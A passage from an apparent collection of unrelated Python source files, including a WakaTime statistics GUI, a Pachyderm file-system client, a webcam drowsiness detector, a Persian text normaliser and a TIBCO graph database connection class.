[sg.Text("Minimum labeling percentage", tooltip=help_minimum_labeling_percentage), sg.InputText("0.0", key="input_minimum_labeling_percentage"), sg.Text("%")],
[sg.Text("Start date", tooltip=help_start_date), sg.InputText("YYYY-MM-DD", key="input_start_date"), sg.CalendarButton("Calendar", format="%Y-%m-%d")],
[sg.Text("End date", tooltip=help_end_date), sg.InputText("YYYY-MM-DD", key="input_end_date"), sg.CalendarButton("Calendar", format="%Y-%m-%d")],
[sg.OK()],
[sg.HorizontalSeparator()],
[sg.Text("* Required.")],
[sg.Text("** Labels separated by commas only.")]
]
window = sg.Window("WakaFree", layout)
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, "Cancel"):
break
elif event == "OK":
file_name = values["input_file"]
graphs += "l" if values["input_graphs_l"] else ""
graphs += "e" if values["input_graphs_e"] else ""
graphs += "o" if values["input_graphs_o"] else ""
totals += "l" if values["input_totals_l"] else ""
totals += "e" if values["input_totals_e"] else ""
totals += "o" if values["input_totals_o"] else ""
ignored_stats = values["input_ignore"].split(",") if values["input_ignore"] != "" else []
searched_stats = values["input_search"].split(",") if values["input_search"] != "" else []
minimum_labeling_percentage = float(values["input_minimum_labeling_percentage"])
try:
start_date = datetime(int(values["input_start_date"][0:4]), int(values["input_start_date"][5:7]), int(values["input_start_date"][8:10])).date()
except:
start_date = datetime(1, 1, 1).date()
try:
end_date = datetime(int(values["input_end_date"][0:4]), int(values["input_end_date"][5:7]), int(values["input_end_date"][8:10])).date()
except:
end_date = datetime(9999, 12, 31).date()
break
window.close()
#Jos käyttäjä ei antanut kumpaakaan valinnaista argumenttia piirtämiseen
if graphs == "" and totals == "":
graphs = "leo"
totals = "leo"
#Jos käyttäjä antaa tiedoston
if file_name != "":
#Avataan tiedosto
with open(file_name, "r") as file:
#Projektin hakemisto
project_directory = os.path.dirname(__file__)
#Luodaan oliot tietoja varten
languages = LanguagesStats()
editors = EditorsStats()
operating_systems = OperatingSystemsStats()
#Haetaan tiedot
data = json.load(file)
#Valmistellaan tietojen lukeminen
Stats.fetch_days_and_labels(
data,
languages=languages.languages if "l" in (graphs + totals).lower() else None,
editors=editors.editors if "e" in (graphs + totals).lower() else None,
operating_systems=operating_systems.operating_systems if "o" in (graphs + totals).lower() else None,
ignored_stats=ignored_stats, searched_stats=searched_stats)
#Muunnetaan päivämäärät oikeaan muotoon
Stats.convert_dates()
#Haetaan halutut tiedot
if "l" in (graphs + totals).lower():
languages.populate_stats(data)
languages.sort_stats_and_populate_keys()
if "e" in (graphs + totals).lower():
editors.populate_stats(data)
editors.sort_stats_and_populate_keys()
if "o" in (graphs + totals).lower():
operating_systems.populate_stats(data)
operating_systems.sort_stats_and_populate_keys()
#Jos käyttäjä haluaa piirtää kuvaajat
if graphs != "" or (graphs == "" and totals == ""):
#Kielten kuvaajat
if "l" in graphs.lower():
draw_graph(Stats.days, languages.keys, languages.languages, os.path.join(project_directory, "Colors/languages_colors.yml"))
#Editorien kuvaajat
if "e" in graphs.lower():
draw_graph(Stats.days, editors.keys, editors.editors, os.path.join(project_directory, "Colors/editors_colors.yml"))
#Käyttöjärjestelmien kuvaajat
if "o" in graphs.lower():
draw_graph(Stats.days, operating_systems.keys, operating_systems.operating_systems, os.path.join(project_directory, "Colors/operating_systems_colors.yml"))
#Jos käyttäjä haluaa näyttää kokonaisajat
if totals != "" or (graphs == "" and totals == ""):
#Kielten kokonaisajat
if "l" in totals.lower():
draw_pie_chart(languages.keys, languages.total_times, os.path.join(project_directory, "Colors/languages_colors.yml"))
#Editorien kokonaisajat
if "e" in totals.lower():
draw_pie_chart(editors.keys, editors.total_times, os.path.join(project_directory, "Colors/editors_colors.yml"))
#Käyttöjärjestelmien kokonaisajat
if "o" in totals.lower():
draw_pie_chart(operating_systems.keys, operating_systems.total_times, os.path.join(project_directory, "Colors/operating_systems_colors.yml"))
#Jos käyttäjä ei antanut tiedostoa tai mitään vaihtoehtoista argumenttia
else:
if not args.gui:
print("\nYou did not specify what you would like to do. To get help, try using either of the following commands:\n\npython WakaFree.py -h\npython WakaFree.py --help") | nilq/baby-python | python |
from keg_elements.extensions import lazy_gettext as _
def base36_to_int(s):
"""
Convert a base 36 string to an int. Raise ValueError if the input won't fit
into an int.
https://git.io/vydSi
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is longer than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError(_("Base36 input too large"))
return int(s, 36)
def int_to_base36(i):
"""Convert an integer to a base36 string.
https://git.io/vydS1
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError(_("Negative base36 conversion input."))
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
| nilq/baby-python | python |
from ..data.context import setCurTxn, getCurTxn
from ..data.txn import Transaction
from ..constants import classNameKey, methodNameKey, preHookKey, postHookKey
def captureTxn(args, kwargs):
txn = Transaction()
setCurTxn(txn)
def endTxn(args, kwargs):
txn = getCurTxn()
if txn is None or args is None:
return
if len(args) <= 0:
return
obj = args[0]
if obj is None:
return
if hasattr(obj,'path'):
txn.setUrl(getattr(obj,'path'))
if hasattr(obj,'command'):
txn.setMethod(getattr(obj, 'command'))
txn.end()
def extractStatusCode(args, kwargs):
txn = getCurTxn()
if txn is None or args is None:
return
if len(args) <= 1:
return
txn.setStatus(args[1])
modulesInfo = {
'http.server': [
{
classNameKey: 'BaseHTTPRequestHandler',
methodNameKey: 'handle_one_request',
preHookKey: captureTxn,
postHookKey: endTxn
},
{
classNameKey: 'BaseHTTPRequestHandler',
methodNameKey: 'send_response',
postHookKey: extractStatusCode
}
]
}
| nilq/baby-python | python |
from django.contrib.auth.models import User, Group
from django.db import models
from primer.db.models import UUIDField
# Monkey Patch User Model
User.add_to_class('uuid', UUIDField())
User.add_to_class('created', models.DateTimeField(auto_now_add=True, editable = False, blank = True, null = True))
User.add_to_class('modified', models.DateTimeField(auto_now=True, blank = True, null = True))
# Monkey Patch Group Model
Group.add_to_class('uuid', UUIDField())
Group.add_to_class('created', models.DateTimeField(auto_now_add=True, editable = False, blank = True, null = True))
Group.add_to_class('modified', models.DateTimeField(auto_now=True, blank = True, null = True)) | nilq/baby-python | python |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import collections
import os
from contextlib import contextmanager
import six
from python_pachyderm.client.pfs.pfs_pb2 import *
from python_pachyderm.client.pfs.pfs_pb2_grpc import *
BUFFER_SIZE = 3 * 1024 * 1024 # 3MB TODO: Base this on some grpc value
class ExtractValueIterator(object):
def __init__(self, r):
self._iter = r
def __iter__(self):
for item in self._iter:
yield item.value
def _commit_from(src, allow_just_repo=False):
if src.__class__.__name__ == "Commit":
return src
elif type(src) in (tuple, list) and len(src) == 2:
return Commit(repo=Repo(name=src[0]), id=src[1])
elif type(src) is str:
repo_name, commit_id = src.split('/', 1)
return Commit(repo=Repo(name=repo_name), id=commit_id)
if not allow_just_repo:
raise ValueError(
"Commit should either be a sequence of [repo, commit_id] or a string in the form 'repo/branch/commit_id")
return Commit(repo=Repo(name=src))
def _make_list(x):
# if `x` is not iterable, put it in a list
if isinstance(x, six.string_types + six.binary_type) or not isinstance(x, collections.Iterable):
x = [x]
return x
def _is_iterator(x):
return hasattr(x, 'next') or hasattr(x, '__next__')
class PfsClient(object):
def __init__(self, host=None, port=None):
"""
Creates a client to connect to Pfs
:param host: The pachd host. Default is 'localhost', which is used with `pachctl port-forward`
:param port: The port to connect to. Default is 30650
"""
# If a host or port is not specified, then try to set using environment variables or use the defaults.
if host is None:
host = os.environ.get('PACHD_SERVICE_HOST', 'localhost')
if port is None:
port = os.environ.get('PACHD_SERVICE_PORT_API_GRPC_PORT', '30650')
self.channel = grpc.insecure_channel('{}:{}'.format(host, port))
self.stub = APIStub(self.channel)
def create_repo(self, repo_name, description=None):
"""
Creates a new Repo object in pfs with the given name. Repos are
the top level data object in pfs and should be used to store data of a
similar type. For example rather than having a single Repo for an entire
project you might have seperate Repos for logs, metrics, database dumps etc.
:param repo_name: Name of the repo
:param description: Repo description
"""
self.stub.CreateRepo(CreateRepoRequest(repo=Repo(name=repo_name), description=description))
def inspect_repo(self, repo_name):
"""
returns info about a specific Repo.
:param repo_name: Name of the repo
:return: A RepoInfo object
"""
return self.stub.InspectRepo(InspectRepoRequest(repo=Repo(name=repo_name)))
def list_repo(self):
"""
Returns info about all Repos.
:param provenance: Optional. Specifies a set of provenance repos where only repos which have ALL of
the specified repos as provenance will be returned.
:return: A list of RepoInfo objects
"""
x = self.stub.ListRepo(ListRepoRequest())
if hasattr(x, 'repo_info'):
return x.repo_info
return []
def delete_repo(self, repo_name=None, force=False, all=False):
"""
Deletes a repo and reclaims the storage space it was using. Note
that as of 1.0 we do not reclaim the blocks that the Repo was referencing,
this is because they may also be referenced by other Repos and deleting them
would make those Repos inaccessible. This will be resolved in later
versions.
:param repo_name: The name of the repo
:param force: if set to true, the repo will be removed regardless of errors.
This argument should be used with care.
:param all: Delete all repos
"""
if not all:
if repo_name:
self.stub.DeleteRepo(DeleteRepoRequest(repo=Repo(name=repo_name), force=force))
else:
raise ValueError("Either a repo_name or all=True needs to be provided")
else:
if not repo_name:
self.stub.DeleteRepo(DeleteRepoRequest(force=force, all=all))
else:
raise ValueError("Cannot specify a repo_name if all=True")
def start_commit(self, repo_name, branch=None, parent=None):
"""
Begins the process of committing data to a Repo. Once started
you can write to the Commit with PutFile and when all the data has been
written you must finish the Commit with FinishCommit. NOTE, data is not
persisted until FinishCommit is called.
:param repo_name: The name of the repo
:param branch: is a more convenient way to build linear chains of commits. When a
commit is started with a non empty branch the value of branch becomes an
alias for the created Commit. This enables a more intuitive access pattern.
When the commit is started on a branch the previous head of the branch is
used as the parent of the commit.
:param parent: specifies the parent Commit, upon creation the new Commit will
appear identical to the parent Commit, data can safely be added to the new
commit without affecting the contents of the parent Commit. You may pass ""
as parentCommit in which case the new Commit will have no parent and will
initially appear empty.
:return: Commit object
"""
return self.stub.StartCommit(StartCommitRequest(parent=Commit(repo=Repo(name=repo_name),
id=parent),
branch=branch))
def finish_commit(self, commit):
"""
Ends the process of committing data to a Repo and persists the
Commit. Once a Commit is finished the data becomes immutable and future
attempts to write to it with PutFile will error.
:param commit: A tuple or string representing the commit
"""
self.stub.FinishCommit(FinishCommitRequest(commit=_commit_from(commit)))
@contextmanager
def commit(self, repo_name, branch=None, parent=None):
"""
A context manager for doing stuff inside a commit
"""
commit = self.start_commit(repo_name, branch, parent)
try:
yield commit
except Exception as e:
print("An exception occurred during an open commit. "
"Trying to finish it (Currently a commit can't be cancelled)")
raise e
finally:
self.finish_commit(commit)
def inspect_commit(self, commit):
"""
returns info about a specific Commit.
:param commit: A tuple or string representing the commit
:return: CommitInfo object
"""
return self.stub.InspectCommit(InspectCommitRequest(commit=_commit_from(commit)))
def provenances_for_repo(self, repo_name):
provenances = {}
commits = self.list_commit(repo_name)
sorted_commits = [x[0] for x in
sorted([(c.commit.id, c.finished.seconds) for c in commits], key=lambda x: x[1])]
for c in sorted_commits:
for p in c.provenance:
provenances[p.id] = c.commit.id
return provenances
def list_commit(self, repo_name, to_commit=None, from_commit=None, number=0):
"""
Lists commits.
:param repo_name: If only `repo_name` is given, all commits in the repo are returned.
:param to_commit: optional. only the ancestors of `to`, including `to` itself,
are considered.
:param from_commit: optional. only the descendents of `from`, including `from`
itself, are considered.
:param number: optional. determines how many commits are returned. If `number` is 0,
all commits that match the aforementioned criteria are returned.
:return: A list of CommitInfo objects
"""
req = ListCommitRequest(repo=Repo(name=repo_name), number=number)
if to_commit is not None:
req.to.CopyFrom(_commit_from(to_commit))
if from_commit is not None:
getattr(req, 'from').CopyFrom(_commit_from(from_commit))
x = self.stub.ListCommit(req)
if hasattr(x, 'commit_info'):
return x.commit_info
return []
def delete_commit(self, commit):
"""
deletes a commit.
Note it is currently not implemented.
:param commit: A tuple or string representing the commit
"""
self.stub.DeleteCommit(DeleteCommitRequest(commit=_commit_from(commit)))
def flush_commit(self, commits, repos=tuple()):
"""
blocks until all of the commits which have a set of commits as
provenance have finished. For commits to be considered they must have all of
the specified commits as provenance. This in effect waits for all of the
jobs that are triggered by a set of commits to complete.
It returns an error if any of the commits it's waiting on are cancelled due
to one of the jobs encountering an error during runtime.
Note that it's never necessary to call FlushCommit to run jobs, they'll run
no matter what, FlushCommit just allows you to wait for them to complete and
see their output once they do.
:param commits: A commit or a list of commits to wait on
:param repos: Optional. Only the commits up to and including those repos
will be considered, otherwise all repos are considered.
:return: An iterator of CommitInfo objects
"""
return self.stub.FlushCommit(FlushCommitRequest(commit=[_commit_from(c) for c in commits],
to_repo=[Repo(name=r) for r in repos]))
def subscribe_commit(self, repo_name, branch, from_commit_id=None):
"""
SubscribeCommit is like ListCommit but it keeps listening for commits as
they come in.
:param repo_name: Name of the repo
:param branch: Branch to subscribe to
:param from_commit_id: Optional. only commits created since this commit are returned
:return: Iterator of Commit objects
"""
repo = Repo(name=repo_name)
req = SubscribeCommitRequest(repo=repo, branch=branch)
if from_commit_id is not None:
getattr(req, 'from').CopyFrom(Commit(repo=repo, id=from_commit_id))
return self.stub.SubscribeCommit(req)
def list_branch(self, repo_name):
"""
lists the active branches on a Repo
:param repo_name: The name of the repo
:return: A list of Branch objects
"""
x = self.stub.ListBranch(ListBranchRequest(repo=Repo(name=repo_name)))
if hasattr(x, 'branch_info'):
return x.branch_info
return []
def set_branch(self, commit, branch_name):
"""
sets a commit and its ancestors as a branch
:param commit: A tuple or string representing the commit
:param branch_name: The name for the branch to set
"""
self.stub.SetBranch(SetBranchRequest(commit=_commit_from(commit),
branch=branch_name))
def delete_branch(self, repo_name, branch_name):
"""
deletes a branch, but leaves the commits themselves intact.
In other words, those commits can still be accessed via commit IDs and
other branches they happen to be on.
:param repo_name: The name of the repo
:param branch_name: The name of the branch to delete
"""
self.stub.DeleteBranch(DeleteBranchRequest(repo=Repo(name=repo_name),
branch=branch_name))
def put_file_bytes(self, commit, path, value, delimiter=NONE,
target_file_datums=0, target_file_bytes=0):
"""
Uploads a binary bytes array as file(s) in a certain path
:param commit: A tuple or string representing the commit
:param path: Path in the repo the file(s) will be written to
:param value: The data bytes array, or an iterator returning chunked byte arrays
:param delimiter: Optional. causes data to be broken up into separate files with `path`
as a prefix.
:param target_file_datums: Optional. specifies the target number of datums in each written
file it may be lower if data does not split evenly, but will never be
higher, unless the value is 0.
:param target_file_bytes: specifies the target number of bytes in each written
file, files may have more or fewer bytes than the target.
"""
if _is_iterator(value):
def _wrap(v):
for x in v:
yield PutFileRequest(file=File(commit=_commit_from(commit), path=path),
value=x,
delimiter=delimiter,
target_file_datums=target_file_datums,
target_file_bytes=target_file_bytes)
self.stub.PutFile(_wrap(value))
return
def _blocks(v):
for i in range(0, len(v), BUFFER_SIZE):
yield PutFileRequest(file=File(commit=_commit_from(commit), path=path),
value=v[i:i + BUFFER_SIZE],
delimiter=delimiter,
target_file_datums=target_file_datums,
target_file_bytes=target_file_bytes)
self.stub.PutFile(_blocks(value))
def put_file_url(self, commit, path, url, recursive=False):
"""
puts a file using the content found at a URL.
The URL is sent to the server which performs the request.
:param commit: A tuple or string representing the commit
:param path: The path to the file
:param url: The url to download
:param recursive: allow for recursive scraping of some types URLs for example on s3:// urls.
"""
self.stub.PutFile(iter([PutFileRequest(file=File(commit=_commit_from(commit), path=path),
url=url,
recursive=recursive)]))
def get_file(self, commit, path, offset_bytes=0, size_bytes=0, extract_value=True):
"""
returns the contents of a file at a specific Commit.
:param commit: A tuple or string representing the commit
:param path: The path of the file
:param offset_bytes: Optional. specifies a number of bytes that should be skipped in the beginning of the file.
:param size_bytes: Optional. limits the total amount of data returned, note you will get fewer bytes
than size if you pass a value larger than the size of the file.
If size is set to 0 then all of the data will be returned.
:param extract_value: If True, then an ExtractValueIterator will be return, which
will iterate over the bytes of the file. If False, then the Protobuf
response iterator will return
:return: An iterator over the file or an iterator over the protobuf responses
"""
r = self.stub.GetFile(GetFileRequest(file=File(commit=_commit_from(commit),
path=path),
offset_bytes=offset_bytes,
size_bytes=size_bytes))
if extract_value:
return ExtractValueIterator(r)
return r
def get_files(self, commit, paths, recursive=False):
"""
returns the contents of a list of files at a specific Commit.
:param commit: A tuple or string representing the commit
:param paths: A list of paths to retrieve
:param recursive: If True, will go into each directory in the list recursively
:return: A dictionary of file paths and data
"""
filtered_file_infos = []
for path in paths:
fi = self.inspect_file(commit, path)
if fi.file_type == FILE:
filtered_file_infos.append(fi)
else:
filtered_file_infos += self.list_file(commit, path, recursive=recursive)
filtered_paths = [fi.file.path for fi in filtered_file_infos if fi.file_type == FILE]
return {path: b''.join(self.get_file(commit, path)) for path in filtered_paths}
def inspect_file(self, commit, path):
"""
returns info about a specific file.
:param commit: A tuple or string representing the commit
:param path: Path to file
:return: A FileInfo object
"""
return self.stub.InspectFile(InspectFileRequest(file=File(commit=_commit_from(commit),
path=path)))
def list_file(self, commit, path, recursive=False):
"""
Lists the files in a directory
:param commit: A tuple or string representing the commit
:param path: The path to the directory
:param recursive: If True, continue listing the files for sub-directories
:return: A list of FileInfo objects
"""
file_infos = self.stub.ListFile(ListFileRequest(file=File(commit=_commit_from(commit),
path=path))).file_info
if recursive:
dirs = [f for f in file_infos if f.file_type == DIR]
files = [f for f in file_infos if f.file_type == FILE]
return sum([self.list_file(commit, d.file.path, recursive) for d in dirs],
files)
return list(file_infos)
def glob_file(self, commit, pattern):
"""
?
:param commit:
:param pattern:
:return: A list of FileInfo objects
"""
r = self.stub.GlobFile(GlobFileRequest(commit=_commit_from(commit),
pattern=pattern))
if hasattr(r, 'file_info'):
return r.file_info
return []
def delete_file(self, commit, path):
"""
deletes a file from a Commit.
DeleteFile leaves a tombstone in the Commit, assuming the file isn't written
to later attempting to get the file from the finished commit will result in
not found error.
The file will of course remain intact in the Commit's parent.
:param commit: A tuple or string representing the commit
:param path: The path to the file
"""
self.stub.DeleteFile(DeleteFileRequest(file=File(commit=_commit_from(commit),
path=path)))
def delete_all(self):
self.stub.DeleteAll(google_dot_protobuf_dot_empty__pb2.Empty())
| nilq/baby-python | python |
__author__ = 'Irina.Chegodaeva'
| nilq/baby-python | python |
from django.shortcuts import render, get_object_or_404
from .models import BlogPost
def blogIndex(request):
blogposts = BlogPost.objects.order_by('-pub_date')
context = {
'heading':'The Blog',
'subheading':'',
'title':'Blog',
'copyright':'Pending',
'blogposts':blogposts,
}
return render(request,'blog-home-2.html',context)
def blogDetail(request,postid):
post = get_object_or_404(BlogPost, pk=postid)
context = {
'post' : post,
'copyright':'Pending',
}
return render(request,'blog-post.html',context) | nilq/baby-python | python |
"""Module test_listwrapper.
The MIT License
Copyright 2022 Thomas Lehmann.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
# pylint: disable=compare-to-zero,no-self-use
from unittest import TestCase
from responsive.data import make_responsive
from responsive.wrapper import ListWrapper
class ListWrapperTest(TestCase):
"""Testing class ListWrapper."""
def test_len(self):
"""Testing length of list."""
wrapper = ListWrapper([1, 2, 3, 4], make_responsive)
self.assertEqual(len(wrapper), 4)
def test_set_and_get_by_index(self):
"""Testing __setitem__ and __getitem__."""
data = [1, 2, 3, 4]
wrapper = ListWrapper([1, 2, 3, 4], make_responsive)
wrapper[2] = 9
self.assertEqual(wrapper[2], 9)
self.assertEqual(data, [1, 2, 3, 4])
def test_eq(self):
"""Testing __eq__."""
data = [1, 2, 3, 4]
wrapper = ListWrapper(data, make_responsive)
self.assertEqual(wrapper, data)
self.assertNotEqual(wrapper, 1234)
def test_iter(self):
"""Testing in and not in."""
data = [1, 2, 3, 4]
wrapper = ListWrapper(data, make_responsive)
self.assertTrue(2 in wrapper)
self.assertTrue(5 not in wrapper)
self.assertEqual(list(wrapper), data)
| nilq/baby-python | python |
import cv2
import dlib
import imutils
from imutils import face_utils
import winsound
from scipy.spatial import distance
detector=dlib.get_frontal_face_detector()
predict=dlib.shape_predictor("C:/Users/kushal asn/Downloads/shape_predictor_68_face_landmarks.dat")
def eye_aspect_ratio(Eye):
A=distance.euclidean(Eye[1],Eye[5])
B=distance.euclidean(Eye[2],Eye[4])
C=distance.euclidean(Eye[0],Eye[3])
ear=(A+B)/(2*C)
return ear
thresh=0.30
frame_rate=30
duration=1000
frequency=2500
(lstart,lend)=face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rstart,rend)=face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
cap=cv2.VideoCapture(0)
flag=0
while(True):
ret,frame=cap.read()
frame=imutils.resize(frame,width=500)
if ret:
gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
subjects=detector(gray,0)
for subject in subjects:
shape=predict(gray,subject)
shape=face_utils.shape_to_np(shape)
leye=shape[lstart:lend]
reye=shape[rstart:rend]
lear=eye_aspect_ratio(leye)
rear=eye_aspect_ratio(reye)
lhull=cv2.convexHull(leye)
rhull=cv2.convexHull(reye)
ear=(lear+rear)/2
if(ear<thresh):
flag+=1
print(flag)
if(flag>frame_rate):
winsound.Beep(frequency,duration)
print("drowsy alert")
else:
flag=0
cv2.imshow("Frame",frame)
if(cv2.waitKey(1)==ord("q")):
break
cv2.destroyAllWindows()
cap.release()
| nilq/baby-python | python |
import re
import cltk.corpus.persian.alphabet as alphabet
from cltk.corpus.arabic.alphabet import *
to_reform = [
{
"characters": [
HAMZA,
HAMZA_BELOW,
HAMZA_ABOVE,
HAMZA_ISOLATED,
MINI_ALEF,
SMALL_ALEF,
SMALL_WAW,
SMALL_YEH,
KASHEEDA,
FATHATAN,
DAMMATAN,
KASRATAN,
FATHA,
DAMMA,
KASRA,
SHADDA,
SUKUN,
alphabet.THOUSANDS,
alphabet.DECIMAL
],
"to_be": ""
},
{
"characters": [
ALEF_MADDA,
ALEF_WASLA,
HAMZA_BELOW_ALEF,
HAMZA_ABOVE_ALEF,
],
"to_be": alphabet.ALEF
},
{
"characters": [
ALEF_MAKSURA,
YEH,
],
"to_be": alphabet.YE
},
{
"characters": [KAF],
"to_be": alphabet.KAF
},
{
"characters": [
LAM_ALEF,
LAM_ALEF_HAMZA_ABOVE,
LAM_ALEF_HAMZA_BELOW,
LAM_ALEF_MADDA_ABOVE,
],
"to_be": alphabet.LAM + alphabet.ALEF
},
{
"characters": [TEH_MARBUTA],
"to_be": alphabet.HE2
},
]
replacementDict = {}
for rule in toReform:
for character in rule["characters"]:
replacementDict[character] = rule["to_be"]
for originalForm, shapedForms in SHAPED_FORMS.items():
for form in shapedForms:
replacementDict[form] = replacementDict.get(originalForm, originalForm)
for i in range(10):
replacementDict[EASTERN_ARABIC_NUMERALS[i]] = alphabet.NUMERALS[i]
replacementDict[WESTERN_ARABIC_NUMERALS[i]] = alphabet.NUMERALS[i]
# Use the commented parts for Word2Vec embeddings
# replacementDict[alphabet.NUMERALS[i]] = " %s " % alphabet.NUMERALS_WRITINGS[i]
# for char in '[!"#%\'()*+,-./:;<=>?@\[\]^_`{|}~’”“′‘\\\]؟؛«»،٪':
# replacementDict[char] = " "
#
# replacementDict[" +"] = " "
replacementRegex = re.compile("(%s)" % "|".join(map(re.escape, replacementDict.keys())))
def standardize(text):
return replacementRegex.sub(lambda mo: replacementDict[mo.string[mo.start():mo.end()]], text)
| nilq/baby-python | python |
from __future__ import absolute_import, division, print_function
VERSION = '1.4.0'
def get_version():
return VERSION
__version__ = get_version()
def get_changelist():
# Legacy from the perforce era, but keeping this. It's not worth breaking
return "UnknownChangelist"
| nilq/baby-python | python |
"""
* Copyright 2019 TIBCO Software Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); You may not use this file except
* in compliance with the License.
* A copy of the License is included in the distribution package with this file.
* You also may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* File name :connectionimpl.py
* Created on: 5/15/2019
* Created by: suresh
*
* SVN Id: $Id: connectionimpl.py 3256 2019-06-10 03:31:30Z ssubrama $
*
* This file encapsulates connection interfaces
"""
from tgdb.log import *
import tgdb.log as tglog
from tgdb.utils import *
from tgdb.impl.atomics import *
import typing
import tgdb.channel as tgchannel
import tgdb.impl.channelimpl as tgchannelimpl
import tgdb.pdu as tgpdu
import tgdb.impl.pduimpl as tgpduimpl
import tgdb.connection as tgconn
import tgdb.model as tgmodel
import tgdb.impl.entityimpl as tgentimpl
import tgdb.impl.gmdimpl as tggmdimpl
import tgdb.query as tgquery
import tgdb.impl.queryimpl as tgqueryimpl
import tgdb.exception as tgexception
import tgdb.bulkio as tgbulk
import tgdb.admin as tgadm
def findCommandForLang(lang: str) -> tgquery.TGQueryCommand:
retCommand: tgquery.TGQueryCommand
if lang == "tgql":
retCommand = tgquery.TGQueryCommand.Execute
elif lang == "gremlin":
retCommand = tgquery.TGQueryCommand.ExecuteGremlinStr
elif lang == "gbc":
retCommand = tgquery.TGQueryCommand.ExecuteGremlin
else:
raise tgexception.TGException("Unknown property for ConnectionDefaultQueryLanguage: %s", lang)
return retCommand
def findCommandAndQueryString(query: str, props: tgchannel.TGProperties) -> typing.Tuple[tgquery.TGQueryCommand, str]:
lang: str = props.get(ConfigName.ConnectionDefaultQueryLanguage,
ConfigName.ConnectionDefaultQueryLanguage.defaultvalue)
retCommand: tgquery.TGQueryCommand
retStr = query
try:
idx: int = query.index("://")
prefix = query[:idx].lower()
retCommand = findCommandForLang(prefix)
retStr = query[idx + 3:]
except ValueError:
lang = lang.lower()
retCommand = findCommandForLang(lang)
return retCommand, retStr
class ConnectionImpl(tgconn.TGConnection):
def __init__(self, url, username, password, dbName: typing.Optional[str], env):
self.__url__ = url
self.__username__ = username
self.__password__ = password
self.__props__: TGProperties = TGProperties(env)
self._dbName = dbName
self.__channel__: tgchannel.TGChannel = tgchannel.TGChannel.createChannel(url, username, password, dbName,
self.__props__)
self.__props__.update(tgchannelimpl.LinkUrl.parse(url).properties)
self.__gof__: tggmdimpl.GraphObjectFactoryImpl = tggmdimpl.GraphObjectFactoryImpl(self)
self.__addEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__updateEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__removeEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__requestIds__ = AtomicReference('i', 0)
def _genBCRWaiter(self) -> tgchannelimpl.BlockingChannelResponseWaiter:
timeout = self.__props__.get(ConfigName.ConnectionOperationTimeoutSeconds, None)
if timeout is not None and isinstance(timeout, str):
timeout = float(timeout)
requestId = self.__requestIds__.increment()
return tgchannelimpl.BlockingChannelResponseWaiter(requestId, timeout)
def connect(self):
tglog.gLogger.log(tglog.TGLevel.Debug, "Attempting to connect")
self.__channel__.connect()
tglog.gLogger.log(tglog.TGLevel.Debug, "Connected, now logging in.")
self.__channel__.start()
tglog.gLogger.log(tglog.TGLevel.Debug, "Logged in, now acquiring metadata.")
self.__initMetadata__()
tglog.gLogger.log(tglog.TGLevel.Debug, "Acquired metadata, now sending connection properties.")
self.__sendConnectionProperties()
tglog.gLogger.log(tglog.TGLevel.Debug, 'Connected successfully')
def __initMetadata__(self):
waiter = self._genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.MetadataRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response = self.__channel__.send(request, waiter)
if response.verbid != tgpdu.VerbId.MetadataResponse:
raise tgexception.TGException('Invalid response object received')
self.__gof__.graphmetadata.registry = response.typeregistry
def disconnect(self):
self.__channel__.disconnect()
self.__channel__.stop()
def commit(self):
channelResponse = self._genBCRWaiter()
try:
if gLogger.level is TGLevel.Debug:
def echoAttributes(ent: tgmodel.TGEntity):
gLogger.log(TGLevel, "Entity ID: %d", ent.virtualId)
attr: tgmodel.TGAttribute
for attr in ent.attributes:
gLogger.log(TGLevel, " Attribute: %s", attr._value)
[echoAttributes(ent) for ent in self.__addEntities__.values()]
[echoAttributes(ent) for ent in self.__updateEntities__.values()]
[echoAttributes(ent) for ent in self.__removeEntities__.values()]
request: tgpduimpl.CommitTransactionRequestMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.CommitTransactionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
attrDescSet = self.graphObjectFactory.graphmetadata.attritubeDescriptors
request.addCommitList(self.__addEntities__, self.__updateEntities__, self.__removeEntities__, attrDescSet)
response: tgpduimpl.CommitTransactionResponseMessage = self.__channel__.send(request, channelResponse)
if response.exception is not None:
raise response.exception
response.finishReadWith(self.__addEntities__, self.__updateEntities__, self.__removeEntities__,
self.__gof__.graphmetadata.registry)
for id in self.__removeEntities__:
